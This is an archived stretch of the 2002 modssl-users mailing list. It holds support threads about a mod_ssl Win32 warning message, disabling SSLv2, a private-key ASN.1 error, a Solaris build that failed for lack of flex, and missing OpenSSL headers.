> Which code is this - is it the Apache OR mod_ssl OR OpenSSL?
> 
> And, if I understood you right, irrespective of the versions of the 
> above software, on Win32 systems, the message is written to the log 
> file. Do you see this log entry in any of the many installations you have?
> 
> 
>  > -----Original Message-----
>  > From: hunter [mailto:theantigod@sympatico.ca]
>  > Sent: Monday, September 30, 2002 9:07 PM
>  > To: modssl-users@modssl.org
>  > Subject: This combination is *NOT* officially supported
>  >
>  >
>  > Ramakrishna Kuppa wrote:
>  > > Chris,
>  > >
>  > > I am getting the following message in my SSL log:
>  > >
>  > > [30/Sep/2002 17:57:49 02000] [info]  Server: Apache/1.3.26,
>  > Interface:
>  > > mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
>  > > [30/Sep/2002 17:57:49 02000] [warn]  You are using mod_ssl
>  > under Win32.
>  > > This combination is *NOT* officially supported. Use it at
>  > your own risk!
>  > >
>  > >
>  > > Anything to be noted/concerned of?
>  > >
>  >
>  > Ramakrishna,
>  >
>  >      /*
>  >       * Identification
>  >       */
>  >      if (mc->nInitCount == 1) {
>  >          ssl_log(s, SSL_LOG_INFO, "Server: %s, Interface: %s,
>  > Library: %s",
>  >                  SERVER_BASEVERSION,
>  >                  ssl_var_lookup(p, NULL, NULL, NULL,
>  > "SSL_VERSION_INTERFACE"),
>  >                  ssl_var_lookup(p, NULL, NULL, NULL,
>  > "SSL_VERSION_LIBRARY"));
>  > #ifdef WIN32
>  >          ssl_log(s, SSL_LOG_WARN, "You are using mod_ssl
>  > under Win32. "
>  >                  "This combination is *NOT* officially supported. "
>  >                  "Use it at your own risk!");
>  > #endif
>  >      }
>  >
>  > ...it is simply a comment - disclaimer - whatever - it is
>  > there in any
>  > case if you are running Windows version.
>  >
>  > Chris.
>  >
>  >
>  > ______________________________________________________________________
>  > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>  > User Support Mailing List                      modssl-users@modssl.org
>  > Automated List Manager                            majordomo@modssl.org
>  >
> 
Ramakrishna,

This code segment is from mod_ssl...

f:\mod_ssl-2.8.10-1.3.26\pkg.sslmod\ssl_engine_init.c
...begins at line 175

Your statement is correct... this message will appear in your log if you 
are using mod_ssl on Windows with Apache 1.3.xx and mod_ssl 2.8.10

I have enabled SSL on only one of my Windows boxes.  It has never logged 
this message but the version is Apache 2.0.40 - OpenSSL 0.9.6g.

...mod_ssl is integrated into Apache 2.

All of my other Windows boxes have the SSL code included but SSL has not 
turned on - may never need to be.

IMHO - It means nothing, unless you are paying for support ... this is 
open source afterall.  Take it as a cheap shot at Windows.  There are 
some days when I share the thought, but I curse my Linux equally.

Chris.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 03:37:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA20873; Wed, 2 Oct 2002 03:36:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id DAA20869; Wed, 2 Oct 2002 03:36:00 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g921Xgmh001556
	for ; Tue, 1 Oct 2002 21:33:42 -0400
Date: Tue, 1 Oct 2002 21:33:42 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: This combination is *NOT* officially supported
In-Reply-To: <3D9A4C78.1090305@sympatico.ca>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 1 Oct 2002, hunter wrote:

> This code segment is from mod_ssl...

Correct.

> I have enabled SSL on only one of my Windows boxes.  It has never logged
> this message but the version is Apache 2.0.40 - OpenSSL 0.9.6g.
> ...mod_ssl is integrated into Apache 2.

mod_ssl is not officially supported on Apache 1.3 on win32.
mod_ssl *is* officially supported on Apache 2.0 on win32.

And under 1.3, it's not that it won't work, it's just that the author
(Ralf) makes no guarantees that it will.  :)

It's that simple.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 14:19:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA06729; Wed, 2 Oct 2002 14:18:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts14-srv.bellnexxia.net id OAA06694; Wed, 2 Oct 2002 14:17:23 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts14-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021002121721.GLAG27522.tomts14-srv.bellnexxia.net@sympatico.ca>;
          Wed, 2 Oct 2002 08:17:21 -0400
Message-ID: <3D9AE3D6.8010106@sympatico.ca>
Date: Wed, 02 Oct 2002 08:17:26 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Ramakrishna Kuppa , modssl-users@modssl.org
CC: Edwin Cleton 
Subject: [Fwd: Sol: Re: Apache.exe generates errors and is closed by Windows.]
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ramakrishna,

The following note was sent to me personally.  I cannot confirm it by my 
own experience, but it is worth considering.  The suggestion is that you 
can still have this problem with the newer code.  This offers a 
potential solution.

Other comments are welcome.

Thanks Edwin.

-Chris.


Original message from Edwin Cleton
Hunter,

This is caused with versions where SSLv2 is still active.
apache 1.3.26, mod_ssl 2.8.10 and openssl 0.9.6g, win32.

SSLv2 MUST be disabled because the problem is not 100% solved between 
0.9.6d and the current 0.9.6g with the win32 platform.

Fwd to List: apache-modssl if you consider this to be of public interest.

Sincerely, Edwin Cleton



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 16:21:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA12127; Wed, 2 Oct 2002 16:20:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id QAA12109; Wed, 2 Oct 2002 16:19:19 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 2 Oct 2002 07:18:12 -0700
Received: from 204.115.33.48 by lw7fd.law7.hotmail.msn.com with HTTP;
	Wed, 02 Oct 2002 14:18:11 GMT
X-Originating-IP: [204.115.33.48]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Wed, 02 Oct 2002 14:18:11 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 02 Oct 2002 14:18:12.0192 (UTC) FILETIME=[8A50F600:01C26A1E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,

I have tested the Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
file in a test environment and it works fine.

You could go ahead and upload it to the
http://www.modssl.org/contrib/ftp/contrib/ location.

Thanks and Regards,

Bye,
-Jim.

>From: hunter Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>Date: Wed, 25 Sep 2002 01:03:47 -0400
>
>Jim Lee wrote:
>>
>>Hi,
>>
>>I wish to have this file that hunter has contributed 
>>(Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip) to be available to 
>>everyone without any problems.
>>
>Jim and friends,
>
>I have also tried to contact someone at OpenSSL, with no reply.
>
>My server is managing and there have been fairly frequent downloads -- I am 
>not concerned yet.  I will have to remove the files if it looks as though I 
>will exceed my upload limit.  My original concerns are probably 
>unwarranted.
>
>The files are not that large, so if you can endure the slow download, you 
>are all welcome to help yourselves.
>
>Jim, the build is ok then?  You have it up and running?
>
>Chris.
>
>
>
>
>


_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 18:07:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA15996; Wed, 2 Oct 2002 18:06:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cshl.org id SAA15983; Wed, 2 Oct 2002 18:05:13 +0200 (MET DST)
Received: from cshl.edu (macavity.cshl.org [143.48.3.74])
	by cshl.org (8.9.1/8.9.1) with ESMTP id JAA18062;
	Wed, 2 Oct 2002 09:05:07 -0700 (PDT)
Message-ID: <3D9B1995.7060204@cshl.edu>
Date: Wed, 02 Oct 2002 12:06:45 -0400
From: Vsevolod Ilyushchenko 
Organization: Cold Spring Harbor Laboratory
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Cannot install certificate: asn1 encoding routines:d2i_ASN1_SET:bad
 tag
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vsevolod Ilyushchenko 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I just got an SSL certificate from Verisign. However, when I try to 
start apache pointing to my key file and certificate, I get the 
following error:

[Tue Oct  1 21:17:28 2002] [error] mod_ssl: Init: Private key not found 
(OpenSSL library error follows)
[Tue Oct  1 21:17:28 2002] [error] OpenSSL: error:0D084069:asn1 encoding 
routines:d2i_ASN1_SET:bad tag
[Tue Oct  1 21:17:28 2002] [error] OpenSSL: error:0D09D082:asn1 encoding 
routines:d2i_RSAPrivateKey:parsing
[Tue Oct  1 21:17:28 2002] [error] OpenSSL: error:0D09B00D:asn1 encoding 
routines:d2i_PrivateKey:ASN1 lib

This is NOT the case of file not being found and NOT the case of having 
to enter the passphrase. Also, I ran openssl -modulus, and the output is 
the same for the certificate and the key file.

I would be grateful for any recommendations.

Thanks,
Simon

-- 
Simon (Vsevolod ILyushchenko)   simonf@cshl.edu
http://www.simonf.com          simonf@simonf.com

"Large software projects are like werewolves because
they transform unexpectedly from the familiar into horrors."
					Fred Brooks
				

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 18:59:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA18815; Wed, 2 Oct 2002 18:58:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fsjrez04.irr.rl.af.mil id SAA18801; Wed, 2 Oct 2002 18:57:45 +0200 (MET DST)
Received: by FSJREZ04.irr.rl.af.mil with Internet Mail Service (5.5.2653.19)
	id ; Wed, 2 Oct 2002 16:57:38 -0000
Message-ID: 
From: Zandi Patrick S TSgt AFRL/IFOSS 
To: "'modssl-users@modssl.org'" 
Subject: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 
Date: Wed, 2 Oct 2002 16:57:28 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26A34.CA195018"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zandi Patrick S TSgt AFRL/IFOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26A34.CA195018
Content-Type: text/plain

Hello folks, 
    I getting strange errors on compile.   Anyone See this.. or have any
ideas
Mod_ssl seems to work fine with
./configure \
--with-apache=../apache_1.3.26 \
--with-ssl=/usr/lcoal/ssl/ \
--prefix=/apache
 
However When I compile the apache I am getting the following.. 
     EEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_scache_shmcb.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208110
-DEAPI -DUSE_EXPAT -I../../lib/expat-lite -DNO_DL_NEEDED `../../apaci`
-DSSL_COMPAT -I/usr/local/ssl/include -DMOD_SSL_VERSION=\"2.8.10\"
ssl_expr.c
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sh: flex: not found
*** Error code 1
make: Fatal error: Command failed for target `ssl_expr_scan.c'
Current working directory
/home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all'
Current working directory /home/oracle/building/apache_1.3.26/src/modules
*** Error code 1
make: Fatal error: Command failed for target `subdirs'
Current working directory /home/oracle/building/apache_1.3.26/src
*** Error code 1
make: Fatal error: Command failed for target `build-std'
Current working directory /home/oracle/building/apache_1.3.26
*** Error code 1
make: Fatal error: Command failed for target `build'


------_=_NextPart_001_01C26A34.CA195018
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable




Message




Hello folks, 


   =20
I getting strange errors on compile.   Anyone See this.. or =
have any=20
ideas


Mod_ssl =
seems to=20
work fine with


./configure \


--with-apache=3D../apache_1.3.26 =
\


--with-ssl=3D/usr/lcoal/ssl/ =
\


--prefix=3D/apache


 


However When=20
I compile the apache I am getting the =
following.. 


     EEDED =
`../../apaci`=20
-DSSL_COMPAT -I/usr/local/ssl/include -DMOD_SSL_VERSION=3D\"2.8.10\"=20
ssl_scache_shmcb.c
gcc -c  -I../../os/unix =
-I../../include  =20
-DSOLARIS2=3D290 -DMOD_SSL=3D208110 -DEAPI -DUSE_EXPAT =
-I../../lib/expat-lite=20
-DNO_DL_NEEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include=20
-DMOD_SSL_VERSION=3D\"2.8.10\" ssl_expr.c
flex -Pssl_expr_yy -s -B=20
ssl_expr_scan.l
sh: flex: not found
*** Error code 1
make: =
Fatal error:=20
Command failed for target `ssl_expr_scan.c'
Current working =
directory=20
/home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code =
1
make:=20
Fatal error: Command failed for target `all'
Current working =
directory=20
/home/oracle/building/apache_1.3.26/src/modules
*** Error code =
1
make:=20
Fatal error: Command failed for target `subdirs'
Current working =
directory=20
/home/oracle/building/apache_1.3.26/src
*** Error code 1
make: =
Fatal=20
error: Command failed for target `build-std'
Current working =
directory=20
/home/oracle/building/apache_1.3.26
*** Error code 1
make: Fatal =
error:=20
Command failed for target `build'


------_=_NextPart_001_01C26A34.CA195018--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 19:19:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20286; Wed, 2 Oct 2002 19:18:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from jul-solserv.panchen.org id TAA20278; Wed, 2 Oct 2002 19:17:24 +0200 (MET DST)
Received: (qmail 21717 invoked from network); 2 Oct 2002 17:17:18 -0000
Received: from jul-xppro.panchen.org (HELO julxppro) (10.40.110.15)
  by jul-solserv.panchen.org with SMTP; 2 Oct 2002 17:17:18 -0000
From: "Julian R Panchen" 
To: 
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 
Date: Wed, 2 Oct 2002 18:17:24 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0002_01C26A3F.F541A880"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4024
Importance: Normal
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Disposition-Notification-To: "Julian R Panchen" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Julian R Panchen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0002_01C26A3F.F541A880
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

You need a copy of flex you can obtain the source code from GNU see
HYPERLINK
"http://www.gnu.org/software/flex/"http://www.gnu.org/software/flex/

 

I am running Apache  1.3.26 and mod_ssl 2.8.10 on Solaris 9 with no
problems.

Regards

Julian R Panchen

 

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Zandi Patrick S TSgt
AFRL/IFOSS
Sent: 02 October 2002 17:57
To: 'modssl-users@modssl.org'
Subject: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 

 

Hello folks, 

    I getting strange errors on compile.   Anyone See this.. or have any
ideas

Mod_ssl seems to work fine with

./configure \

--with-apache=../apache_1.3.26 \

--with-ssl=/usr/lcoal/ssl/ \

--prefix=/apache

 

However When I compile the apache I am getting the following.. 

     EEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_scache_shmcb.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290
-DMOD_SSL=208110 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite
-DNO_DL_NEEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_expr.c
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sh: flex: not found
*** Error code 1
make: Fatal error: Command failed for target `ssl_expr_scan.c'
Current working directory
/home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all'
Current working directory
/home/oracle/building/apache_1.3.26/src/modules
*** Error code 1
make: Fatal error: Command failed for target `subdirs'
Current working directory /home/oracle/building/apache_1.3.26/src
*** Error code 1
make: Fatal error: Command failed for target `build-std'
Current working directory /home/oracle/building/apache_1.3.26
*** Error code 1
make: Fatal error: Command failed for target `build'




---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.393 / Virus Database: 223 - Release Date: 30/09/2002
 

------=_NextPart_000_0002_01C26A3F.F541A880
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable









Message
















---

Outgoing mail is certified Virus Free.

Checked by AVG anti-virus system (http://www.grisoft.com).

Version: 6.0.393 / Virus Database: 223 - Release Date: 30/09/2002

 


------=_NextPart_000_0002_01C26A3F.F541A880--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 19:43:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20617; Wed, 2 Oct 2002 19:42:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fsjrez04.irr.rl.af.mil id TAA20608; Wed, 2 Oct 2002 19:41:38 +0200 (MET DST)
Received: by FSJREZ04.irr.rl.af.mil with Internet Mail Service (5.5.2653.19)
	id ; Wed, 2 Oct 2002 17:41:31 -0000
Message-ID: 
From: Zandi Patrick S TSgt AFRL/IFOSS 
To: "'modssl-users@modssl.org'" 
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 
Date: Wed, 2 Oct 2002 17:41:29 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26A3A.F04D269D"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zandi Patrick S TSgt AFRL/IFOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26A3A.F04D269D
Content-Type: text/plain

It worked -- It figures.. Where did you find that is the Doc's ?
I did not have to do that with solaris 8 !
= 8 ^)

-----Original Message-----
From: Julian R Panchen [mailto:julian@panchen.org] 
Sent: Wednesday, October 02, 2002 1:17 PM
To: modssl-users@modssl.org
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 


You need a copy of flex you can obtain the source code from GNU see
http://www.gnu.org/software/flex/  

 

I am running Apache  1.3.26 and mod_ssl 2.8.10 on Solaris 9 with no
problems.

Regards

Julian R Panchen

 

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Zandi Patrick S TSgt AFRL/IFOSS
Sent: 02 October 2002 17:57
To: 'modssl-users@modssl.org'
Subject: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 

 

Hello folks, 

    I getting strange errors on compile.   Anyone See this.. or have any
ideas

Mod_ssl seems to work fine with

./configure \

--with-apache=../apache_1.3.26 \

--with-ssl=/usr/lcoal/ssl/ \

--prefix=/apache

 

However When I compile the apache I am getting the following.. 

     EEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_scache_shmcb.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208110
-DEAPI -DUSE_EXPAT -I../../lib/expat-lite -DNO_DL_NEEDED `../../apaci`
-DSSL_COMPAT -I/usr/local/ssl/include -DMOD_SSL_VERSION=\"2.8.10\"
ssl_expr.c
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sh: flex: not found
*** Error code 1
make: Fatal error: Command failed for target `ssl_expr_scan.c'
Current working directory
/home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all'
Current working directory /home/oracle/building/apache_1.3.26/src/modules
*** Error code 1
make: Fatal error: Command failed for target `subdirs'
Current working directory /home/oracle/building/apache_1.3.26/src
*** Error code 1
make: Fatal error: Command failed for target `build-std'
Current working directory /home/oracle/building/apache_1.3.26
*** Error code 1
make: Fatal error: Command failed for target `build'




---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.393 / Virus Database: 223 - Release Date: 30/09/2002



------_=_NextPart_001_01C26A3A.F04D269D
Content-Type: text/html




Message






It 
worked -- It figures.. Where did you find that is the Doc's 
?


I did 
not have to do that with solaris 8 !


= 8 
^)



  

  
-----Original Message-----
From: Julian R Panchen 
  [mailto:julian@panchen.org] 
Sent: Wednesday, October 02, 2002 1:17 
  PM
To: modssl-users@modssl.org
Subject: RE: 
  mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 


  

  
You need a copy of 
  flex you can obtain the source code from GNU see http://www.gnu.org/software/flex/

  
 

  
I am running 
  Apache  1.3.26 and mod_ssl 2.8.10 on Solaris 9 with no 
  problems.

  
Regards

  
Julian R 
  Panchen

  
 

  
-----Original 
  Message-----
From: 
  owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Zandi Patrick S TSgt 
  AFRL/IFOSS
Sent: 02 October 
  2002 17:57
To: 
  'modssl-users@modssl.org'
Subject: mod_ssl-2.8.10-1.3.26 on Solaris 
  9 getting errors 

  
 

  

  
Hello 
  folks, 

  

  
    I 
  getting strange errors on compile.   Anyone See this.. or have any 
  ideas

  

  
Mod_ssl 
  seems to work fine with

  

  
./configure \

  

  
--with-apache=../apache_1.3.26 
  \

  

  
--with-ssl=/usr/lcoal/ssl/ 
  \

  

  
--prefix=/apache

  

  
 

  

  
However When I 
  compile the apache I am getting the 
  following.. 

  

  
     EEDED 
  `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include 
  -DMOD_SSL_VERSION=\"2.8.10\" ssl_scache_shmcb.c
gcc -c  
  -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208110 
  -DEAPI -DUSE_EXPAT -I../../lib/expat-lite -DNO_DL_NEEDED `../../apaci` 
  -DSSL_COMPAT -I/usr/local/ssl/include -DMOD_SSL_VERSION=\"2.8.10\" 
  ssl_expr.c
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sh: flex: not 
  found
*** Error code 1
make: Fatal error: Command failed for target 
  `ssl_expr_scan.c'
Current working directory 
  /home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code 
  1
make: Fatal error: Command failed for target `all'
Current working 
  directory /home/oracle/building/apache_1.3.26/src/modules
*** Error code 
  1
make: Fatal error: Command failed for target `subdirs'
Current working 
  directory /home/oracle/building/apache_1.3.26/src
*** Error code 1
make: 
  Fatal error: Command failed for target `build-std'
Current working 
  directory /home/oracle/building/apache_1.3.26
*** Error code 1
make: 
  Fatal error: Command failed for target 
  `build'



  
---
Outgoing mail is certified Virus Free.
Checked by 
  AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.393 / Virus 
  Database: 223 - Release Date: 
30/09/2002


------_=_NextPart_001_01C26A3A.F04D269D--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 19:45:53 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20676; Wed, 2 Oct 2002 19:44:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sgcmail1.safelite.com id TAA20650; Wed, 2 Oct 2002 19:43:51 +0200 (MET DST)
Received: through eSafe SMTP Relay 1032083455; Wed Oct 02 13:43:47 2002
Received: by sgcmail1.safelite.com with Internet Mail Service (5.5.2650.21)
	id ; Wed, 2 Oct 2002 13:42:24 -0400
Message-ID: 
From: "Xiao, Wei" 
To: "'modssl-users@modssl.org'" 
Subject: OpenSSL 0.9.6e and Apache 2.0.39.
Date: Wed, 2 Oct 2002 13:42:22 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26A3B.10035024"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xiao, Wei" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26A3B.10035024
Content-Type: text/plain;
	charset="iso-8859-1"

I was trying to install apache with SSL. I can build and install OpenSSL
0.9.6e. When I run configure of Apache, I got following error messages,

checking for SSL/TLS toolkit base... /usr/ssl/install/openssl/
checking for SSL/TLS toolkit version...
checking for SSL/TLS toolkit includes... configure: error: OpenSSL headers
not found

If you can help, that will be great. Thank you very much.

Wei

Wei Xiao
Safelite Glass Corp
IS - Web Development
wei.xiao@safelite.com
614.798.2361


------_=_NextPart_001_01C26A3B.10035024
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






OpenSSL 0.9.6e and Apache 2.0.39.




I was trying to install apache with SSL. I can build an=
d install OpenSSL 0.9.6e. When I run configure of Apache, I got following=
 error messages,



checking for SSL/TLS toolkit base... /usr/ssl/install/o=
penssl/

checking for SSL/TLS toolkit version...

checking for SSL/TLS toolkit includes... configure: er=
ror: OpenSSL headers not found




If you can help, that will be great. Thank you very muc=
h.




Wei




Wei Xiao

Safelite Glass Corp

IS - Web Development

wei.xiao@safelite.com

614.798.2361






------_=_NextPart_001_01C26A3B.10035024--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 19:53:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21349; Wed, 2 Oct 2002 19:52:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fsjrez04.irr.rl.af.mil id TAA21342; Wed, 2 Oct 2002 19:51:46 +0200 (MET DST)
Received: by FSJREZ04.irr.rl.af.mil with Internet Mail Service (5.5.2653.19)
	id ; Wed, 2 Oct 2002 17:51:22 -0000
Message-ID: 
From: Zandi Patrick S TSgt AFRL/IFOSS 
To: "'modssl-users@modssl.org'" 
